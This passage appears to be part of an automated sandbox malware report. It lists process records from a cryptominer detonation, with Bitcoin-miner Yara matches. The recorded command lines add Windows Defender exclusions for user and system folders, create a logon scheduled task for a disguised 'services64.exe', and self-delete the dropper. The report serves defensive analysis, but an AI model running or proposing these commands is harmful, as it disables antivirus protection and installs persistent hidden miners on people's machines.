                                                                                                                                                                Target ID:94
                                                                                                                                                                Start time:11:42:35
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:95
                                                                                                                                                                Start time:11:42:35
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:96
                                                                                                                                                                Start time:11:42:35
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:98
                                                                                                                                                                Start time:11:42:36
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:99
                                                                                                                                                                Start time:11:42:36
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:100
                                                                                                                                                                Start time:11:42:36
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:101
                                                                                                                                                                Start time:11:42:37
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:102
                                                                                                                                                                Start time:11:42:37
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:103
                                                                                                                                                                Start time:11:42:37
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:104
                                                                                                                                                                Start time:11:42:37
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:105
                                                                                                                                                                Start time:11:42:38
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:106
                                                                                                                                                                Start time:11:42:38
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:107
                                                                                                                                                                Start time:11:42:38
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\svchost64.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
                                                                                                                                                                Imagebase:0x10000
                                                                                                                                                                File size:38'400 bytes
                                                                                                                                                                MD5 hash:A8638A5105C9A663B0D6918D64B3AD21
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: 0000006B.00000000.2677511483.0000000000012000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: C:\Users\user\AppData\Local\Temp\svchost64.exe, Author: Joe Security
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:108
                                                                                                                                                                Start time:11:42:38
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:109
                                                                                                                                                                Start time:11:42:38
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:110
                                                                                                                                                                Start time:11:42:39
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                                                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                                                File size:235'008 bytes
                                                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:111
                                                                                                                                                                Start time:11:42:39
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:112
                                                                                                                                                                Start time:11:42:39
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:113
                                                                                                                                                                Start time:11:42:39
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:114
                                                                                                                                                                Start time:11:42:39
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\services64.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\services64.exe
                                                                                                                                                                Imagebase:0xa80000
                                                                                                                                                                File size:45'056 bytes
                                                                                                                                                                MD5 hash:651396CF297F15A1F92EE0A29E27C4EA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:115
                                                                                                                                                                Start time:11:42:39
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:116
                                                                                                                                                                Start time:11:42:39
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:117
                                                                                                                                                                Start time:11:42:39
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:118
                                                                                                                                                                Start time:11:42:39
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:119
                                                                                                                                                                Start time:11:42:39
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:120
                                                                                                                                                                Start time:11:42:40
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:121
                                                                                                                                                                Start time:11:42:40
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:122
                                                                                                                                                                Start time:11:42:41
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\services64.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\system32\services64.exe"
                                                                                                                                                                Imagebase:0x420000
                                                                                                                                                                File size:45'056 bytes
                                                                                                                                                                MD5 hash:651396CF297F15A1F92EE0A29E27C4EA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: 0000007A.00000002.2763019419.000000000340A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:123
                                                                                                                                                                Start time:11:42:41
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:124
                                                                                                                                                                Start time:11:42:41
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:125
                                                                                                                                                                Start time:11:42:41
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:126
                                                                                                                                                                Start time:11:42:41
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:127
                                                                                                                                                                Start time:11:42:41
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:128
                                                                                                                                                                Start time:11:42:41
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\choice.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:choice /C Y /N /D Y /T 3
                                                                                                                                                                Imagebase:0x7ff62e2e0000
                                                                                                                                                                File size:35'840 bytes
                                                                                                                                                                MD5 hash:1A9804F0C374283B094E9E55DC5EE128
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:129
                                                                                                                                                                Start time:11:42:41
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:130
                                                                                                                                                                Start time:11:42:41
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:131
                                                                                                                                                                Start time:11:42:43
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:132
                                                                                                                                                                Start time:11:42:43
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:133
                                                                                                                                                                Start time:11:42:43
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:134
                                                                                                                                                                Start time:11:42:44
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:135
                                                                                                                                                                Start time:11:42:44
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:136
                                                                                                                                                                Start time:11:42:45
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

